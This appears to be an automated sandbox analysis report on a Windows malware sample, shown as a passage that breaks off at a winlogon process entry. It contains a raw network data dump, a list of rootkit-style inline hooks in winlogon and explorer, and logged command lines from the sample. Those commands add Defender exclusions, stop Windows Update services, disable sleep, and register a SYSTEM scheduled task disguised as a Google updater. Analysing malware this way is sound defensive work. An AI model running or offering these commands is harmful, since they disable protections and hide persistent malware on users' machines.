                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: dd 4d c3 ba 6b 5f 38 e8 3c 11 2a 00 97 00 7b 96 03 1b 81 b4 b0 2a c2 57 23 81 b4 b0 aa 66 83 bb 03 dc 8e 86 66 48 2f fb 6e 4f 6d fb b8 87 64 b7 ac 59 7f c7 53 fe 70 47 88 bc 24 83 82 68 c6 4d 21 e6 6a 7b 52 23 4a 5e da 2e ae 1a 87 11 d9 b5 3c 89 d6 4d a9 34 53 27 e7 44 f9 ed a4 1f 69 19 29 78 f2 e8 a7 64 15 04 00 d0 aa 58 da d1 77 78 9d 2d fd 32 be 71 e5 87 11 d9 d6 d8 0f 61 a4 ee a7 77 43 c3 48 7a 3e 17 c0 d1 bb e5 87 11 bf 38 dd a2 51 4b 4b 6c c1 ac a7 8b 20 10 e5 87 11 d9 58 e7 50 ef 50 da 63 fe 0b 27 46 ee 18 78 ee 2e 2e 43 da 8b 10 ab 51 11 60 1c 96 5a 80 9f a3 f0 f9 dd 28 ce 23 b2 99 36 b4 58 cb 27 1a 89 04 ec 27 4f e3 58 5a 74 d5 ce c0 01 e7 00 91 f1 82 d5 30 3d f8 43 0f 3b ce 44 54 f3 20 a4 97 e3 44 a0 35 23 c7 57 ff ad 16 de 0d 88 05 57 50 af 14
                                                                                                    Data Ascii: Mk_8<*{*W#ffH/nOmdYSpG$hM!j{R#J^.<M4S'Di)xdXwx-2qawCHz>8QKKl XPPc'Fx..CQ`Z(#6X''OXZt0=C;DT D5#WWP
                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: 92 62 7c c3 95 6c 9f d1 c5 1c 38 28 dc ad e0 76 7d 1d 92 69 dd d0 c5 1c 38 f7 14 c3 a2 58 d6 87 3c 2a 4f 6b fd ab c3 ed 78 20 c8 16 cc 93 cf 2f 1c 47 d5 3e 6b 7b e0 d3 5f 40 23 99 9d 91 03 0c 95 d4 a9 07 15 1d 3a e6 3f ab cb 44 13 3e 19 05 0b a8 4b 16 08 61 b2 b4 0d 9f b9 be 17 aa 09 d3 ee 7b ac 88 ca 17 cc d1 c5 1c 38 47 f4 5b 76 fb 41 0e 6f 24 f8 ff 3b f7 ca be 23 2a 1a 9d c3 80 8f 77 15 d0 c5 1c d4 e5 63 be 17 41 84 5a 34 aa c3 ed 78 5f 73 27 05 4b c3 1e 05 db 20 65 a5 69 89 02 f4 96 d0 c4 df 0b 2f 3a e3 e7 dd 8f 54 40 6c e3 0b 45 e4 c4 5e 34 46 27 d3 c5 1c 38 16 f8 97 cc 15 da 35 ce 70 ab c8 d8 7a 07 2f ea 0c bf e9 84 6e ad 7a d1 93 66 d6 48 8f 38 4d 04 85 ba a4 b7 5b 9b 2f d1 d4 8a c2 b6 87 69 41 27 15 f3 27 3a e3 c7 d1 56 70 c5 cc 12 eb 49 72 1c 87
                                                                                                    Data Ascii: b|l8(v}i8X<*Okx /G>k{_@#:?D>Ka{8G[vAo$;#*wcAZ4x_s'K ei/:T@lE^4F'85pz/nzfH8M[/iA'':VpIr
                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: 23 85 34 bb a2 6f 81 cf 15 34 8b 30 c9 cf 15 34 92 6e 49 cf 15 34 83 19 51 3e 18 a6 66 a9 1e 57 82 b6 f8 42 91 f0 19 71 db 4f cb 04 3c 71 da 42 00 2f 62 57 53 e1 79 07 23 78 ab b0 1a ea 4f 8b 78 ab b0 46 aa 53 33 f8 90 b8 0c 18 44 7e 2e ed 39 58 de 1e 7b 4e 2b 93 4f 7f 22 c2 e9 c9 37 f0 c6 79 23 22 9b d6 dc 73 c2 c3 69 49 2a d3 c2 c3 69 08 ba 13 c2 c3 69 28 e4 bb c2 c3 69 a0 1d 53 b9 28 fd 8e 8a 4c f6 6f 60 c1 a5 4d 50 d4 42 d0 d6 10 44 cc d7 29 90 3b a9 fb 7a 96 09 0d 7a b5 b0 18 58 e5 6d f8 dd 8e 6c 14 66 49 9e b6 ac a7 85 01 75 84 4a 4f b0 d8 6d d5 05 0d 96 7c 40 c1 ad e6 6b a0 9e 49 6b 4f 83 47 c1 47 a7 c2 48 bb a8 46 92 0e 7d 13 56 fe 28 80 f1 2c a1 d8 1d 46 5b ef f9 25 f2 25 2e 77 f0 0e ca 95 2e 77 f0 9f a4 fd 2e 77 f0 16 1c 15 a6 e2 b7 ae a6 26 d4
                                                                                                    Data Ascii: #4o404nI4Q>fWBqO<qB/bWSy#xOxFS3D~.9X{N+O"7y#"siI*ii(iS(Lo`MPBD);zzXmlfIuJOm|@kIkOGGHF}V(,F[%%.w.w.w&
                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: ac 1e 0c 16 e5 64 cf 45 93 05 2c 01 86 61 a8 4b 2c e4 18 73 5a 73 3e f1 77 b4 11 35 b2 ee f4 0f 52 60 d1 0a 52 ef 37 74 ba ad f4 01 ec 75 7d ef 63 3b 09 52 0a fa 03 31 e0 1a 00 02 5a 98 f8 1a 00 02 f3 49 10 1a 00 02 da c0 28 1a 00 02 83 47 48 1a 00 02 03 f6 38 01 91 46 f5 3b a8 45 12 88 a2 d8 1a 7f e0 32 83 a1 ab 19 76 80 1d 26 3d 5c 94 4d 58 bd 76 e4 62 3d 2e 25 1e 67 9e 8f fc c2 be f3 3f 0a e9 7a b2 2e 07 64 9e 8f 74 d0 99 28 4d b4 3b 01 d7 bf 61 70 0b 53 4c 09 91 8a 43 c6 d1 8e dd 9e e1 96 ee b9 91 62 8d 38 59 9c 51 94 a5 63 64 aa 6c 6a 14 66 29 ec 5f 22 e6 e0 c3 e0 22 1f bb a1 44 c5 a1 f7 d2 5e b7 9a 61 70 bb f1 13 25 ee 30 ad d1 2f 60 39 64 9e 8f 20 50 14 51 74 d0 a2 4e 46 6c 8f 79 85 ae 10 1b 70 fc 52 d8 65 f9 29 b9 ac c9 47 9a 18 66 9c 02 cf fd 19
                                                                                                    Data Ascii: dE,aK,sZs>w5R`R7tu}c;R1ZI(GH8F;E2v&=\MXvb=.%g?z.dt(M;apSLCb8YQcdljf)_""D^ap%0/`9d PQtNFlypRe)Gf
                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: f6 8e ff 32 72 2a 8a 93 77 c6 8d 11 b8 c8 4a b9 9d 20 72 bc 20 2c e6 45 eb 73 24 48 eb 66 50 f3 4e 97 20 1f b8 0e d6 36 7e 0f 78 5e d5 3e eb 2b 7e c3 75 f8 5b b0 68 df 37 58 fb b0 68 df e7 68 3b b0 68 df 07 38 ad cc 98 46 2e 0b 24 49 0d 27 07 fc c4 68 83 3f 72 66 cb 27 f5 7d 9c 02 2e 64 71 8a 31 b1 49 bf 3c 96 1e 32 03 5a ac ac 26 6e 32 03 5a 24 cc 9e b6 8f 58 5a 9a 8a 93 07 ac a5 11 c8 28 0a 92 cc fc a5 c0 68 8a 52 66 e8 a5 a0 9c 48 81 44 24 08 9c a7 d4 be 48 c7 44 24 10 27 cd 36 55 ff 74 24 00 9d 48 8d 64 24 10 e8 1d 83 28 01 d0 5b 82 b6 36 4e 5f fc 19 71 f5 49 b5 8a 54 4f 78 58 d1 dd 8a 54 4f 50 58 bd 8d 8a 54 4f 48 58 f9 c5 8a 54 4f f0 14 85 2d 0d bc 68 03 a3 ff a1 a8 b1 a2 81 6a 01 0b e0 6d d0 2c a5 e5 05 62 f6 e8 7b a8 d6 19 ad c7 88 b3 23 ad a8 2a
                                                                                                    Data Ascii: 2r*wJ r ,Es$HfPN 6~x^>+~u[h7Xhh;h8F.$I'h?rf'}.dq1I<2Z&n2Z$XZ(hRfHD$HD$'6Ut$Hd$([6N_qITOxXTOPXTOHXTO-hjm,b{#*
                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: 0b c6 f6 37 a7 ab 08 86 5c b5 e8 f6 ee ce 60 1d 50 09 b4 5c 27 00 c8 4f 60 fc d5 12 39 b3 22 f7 bd f6 d7 64 69 d6 ce 50 78 29 b4 31 c7 99 60 94 7f 77 79 fe 37 a6 94 b6 33 e2 28 58 cf 0c 24 3c 9b ca cb 67 98 16 4f 33 95 64 76 3c c2 37 36 d9 9d 3e 7d 52 f5 4a 61 49 eb 71 af 5e ad 44 9b 68 13 00 99 07 40 a8 f2 61 2e 5f ad 9d fc 7c de 46 d3 f8 42 ce 38 66 db 7f dd 43 c9 92 0e 3a ea b4 2d 84 30 8c 18 53 b4 31 c7 f9 7a c7 c2 ab e3 5b 86 43 0a e9 23 90 8d 13 34 66 38 4e bd f5 16 6c 9b f1 99 bf fc f7 5f 52 10 8f 0d fd 3a 90 91 26 46 bc 1f 66 02 d1 8d 3c 3a 66 5e 33 bb af 06 79 0f e3 4a ce 38 66 58 4b 2d 3f 34 b8 ac f5 42 a0 58 d3 17 38 6e 5c dc 0c d5 35 4d d8 50 08 6a 5c c2 37 36 d9 d2 1c 67 32 c6 ac 5e 32 d1 12 37 92 87 f2 76 a8 34 1b df 7d 7c 14 88 e9 e1 f4 26
                                                                                                    Data Ascii: 7\`P\'O`9"diPx)1`wy73(X$<gO3dv<76>}RJaIq^Dh@a._|FB8fC:-0S1z[C#4f8Nl_R:&Ff<:f^3yJ8fXK-?4BX8n\5MPj\76g2^27v4}|&
                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: 1e 6d dd 0e 4f 8c 5e 78 10 61 5d ce 95 cf cb 2a 70 84 99 2a aa 48 9a 9e 9e f9 b7 05 eb f9 78 e8 88 15 1d b8 db 5b fc 85 ab 10 4a 8f 4b ce c7 32 c7 91 2b 17 a2 f7 0d d2 dc cd 89 31 91 cc b4 31 f6 87 39 5d 67 cd 2f c4 77 58 df 6d 3e 41 2f c7 bb 68 90 3b 30 24 95 ff 7f 4d 7e a5 be c4 5b 26 43 f9 6b 98 c5 90 78 12 52 7e 9f e2 ad 3c 95 58 8a bb b8 21 98 7b 72 56 e7 e3 c6 68 b7 1c fb db 9b b8 d1 dd 6c a7 9f f7 d9 38 ba b8 21 98 d4 20 d7 55 c0 90 ee 55 d7 2e 87 f5 80 e2 7d 0c d9 4c 01 8b 40 60 c4 ed e4 16 3f a5 64 72 d9 b5 6e 58 6a 22 3d a2 51 d4 e6 c0 be d0 d8 f0 0e 02 0f 3a 82 6e 75 db 10 40 5a 46 0d d1 ca 88 e8 ba 3f 41 2f bc 3e 7f 45 f4 7f c4 2e 4e 11 88 b6 25 3f 78 00 3c b2 10 ff 51 72 c2 fd 84 22 7a b9 3d 9a 22 c3 e1 db 55 ec 52 4b ec 9b 28 5d 4f 06 47 09
                                                                                                    Data Ascii: mO^xa]*p*Hx[JK2+119]g/wXm>A/h;0$M~[&CkxR~<X!{rVhl8! UU.}L@`?drnXj"=Q:nu@ZF?A/>E.N%?x<Qr"z="URK(]OG


                                                                                                    Code Manipulations

                                                                                                    Function NameHook TypeActive in Processes
                                                                                                    ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                                                    NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                    ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                    NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                                                    ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                                                    NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                                                    NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                                                    ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                    ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                    NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                    RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                    NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                    NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                    ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                    ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                                                    Function NameHook TypeNew Data
                                                                                                    ZwEnumerateKeyINLINE0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                                                                                                    NtQuerySystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                                                                                                    ZwResumeThreadINLINE0xE9 0x98 0x83 0x32 0x29 0x9F
                                                                                                    NtDeviceIoControlFileINLINE0xE9 0x9E 0xE3 0x33 0x35 0x5F
                                                                                                    ZwDeviceIoControlFileINLINE0xE9 0x9E 0xE3 0x33 0x35 0x5F
                                                                                                    NtEnumerateKeyINLINE0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                                                                                                    NtQueryDirectoryFileINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF
                                                                                                    ZwEnumerateValueKeyINLINE0xE9 0x9E 0xE3 0x33 0x32 0x2F
                                                                                                    ZwQuerySystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                                                                                                    NtResumeThreadINLINE0xE9 0x98 0x83 0x32 0x29 0x9F
                                                                                                    RtlGetNativeSystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                                                                                                    NtQueryDirectoryFileExINLINE0xE9 0x95 0x53 0x30 0x0C 0xCF
                                                                                                    NtEnumerateValueKeyINLINE0xE9 0x9E 0xE3 0x33 0x32 0x2F
                                                                                                    ZwQueryDirectoryFileExINLINE0xE9 0x95 0x53 0x30 0x0C 0xCF
                                                                                                    ZwQueryDirectoryFileINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF
                                                                                                    Function NameHook TypeNew Data
                                                                                                    ZwEnumerateKeyINLINE0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                                                                                                    NtQuerySystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                                                                                                    ZwResumeThreadINLINE0xE9 0x98 0x83 0x32 0x29 0x9F
                                                                                                    NtDeviceIoControlFileINLINE0xE9 0x9E 0xE3 0x33 0x35 0x5F
                                                                                                    ZwDeviceIoControlFileINLINE0xE9 0x9E 0xE3 0x33 0x35 0x5F
                                                                                                    NtEnumerateKeyINLINE0xE9 0x9A 0xA3 0x32 0x2E 0xEF
                                                                                                    NtQueryDirectoryFileINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF
                                                                                                    ZwEnumerateValueKeyINLINE0xE9 0x9E 0xE3 0x33 0x32 0x2F
                                                                                                    ZwQuerySystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                                                                                                    NtResumeThreadINLINE0xE9 0x98 0x83 0x32 0x29 0x9F
                                                                                                    RtlGetNativeSystemInformationINLINE0xE9 0x9A 0xA3 0x32 0x2C 0xCF
                                                                                                    NtQueryDirectoryFileExINLINE0xE9 0x95 0x53 0x30 0x0C 0xCF
                                                                                                    NtEnumerateValueKeyINLINE0xE9 0x9E 0xE3 0x33 0x32 0x2F
                                                                                                    ZwQueryDirectoryFileExINLINE0xE9 0x95 0x53 0x30 0x0C 0xCF
                                                                                                    ZwQueryDirectoryFileINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:10:29:47
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Users\user\Desktop\zufmUwylvo.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\zufmUwylvo.exe"
                                                                                                    Imagebase:0x125b8dc0000
                                                                                                    File size:266'752 bytes
                                                                                                    MD5 hash:C526CB2C72A976831C06FC09991E20D8
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:10:29:51
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
                                                                                                    Imagebase:0x140000000
                                                                                                    File size:20'970'496 bytes
                                                                                                    MD5 hash:413E4E7BC129E8165D1FFD2B1AE5DB04
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 29%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:10:29:52
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                                                                                    Imagebase:0x7ff7e5d60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:10:29:52
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6a42c0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:10:29:52
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff666670000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:CA9A549C17932F9CAA154B5528EBD8D4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:10:29:52
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff69bb50000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:10:29:52
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr All
                                                                                                    Imagebase:0x7ff75ad70000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:10:29:55
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                    Imagebase:0x7ff695fe0000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:10:29:55
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6a42c0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:10:29:56
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                    Imagebase:0x7ff7e5d60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:11
                                                                                                    Start time:10:29:56
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6a42c0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:10:29:56
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop UsoSvc
                                                                                                    Imagebase:0x7ff7fa3b0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:10:29:56
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop WaaSMedicSvc
                                                                                                    Imagebase:0x7ff7fa3b0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:14
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop wuauserv
                                                                                                    Imagebase:0x7ff7fa3b0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop bits
                                                                                                    Imagebase:0x7ff7fa3b0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop dosvc
                                                                                                    Imagebase:0x7ff7fa3b0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:17
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                    Imagebase:0x7ff7e5d60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:18
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6a42c0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:19
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\dialer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\dialer.exe
                                                                                                    Imagebase:0x7ff76f9c0000
                                                                                                    File size:39'936 bytes
                                                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:20
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                    Imagebase:0x7ff6f0da0000
                                                                                                    File size:96'256 bytes
                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:21
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                    Imagebase:0x7ff695fe0000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:22
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6a42c0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:23
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                    Imagebase:0x7ff6f0da0000
                                                                                                    File size:96'256 bytes
                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:24
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\winlogon.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:winlogon.exe
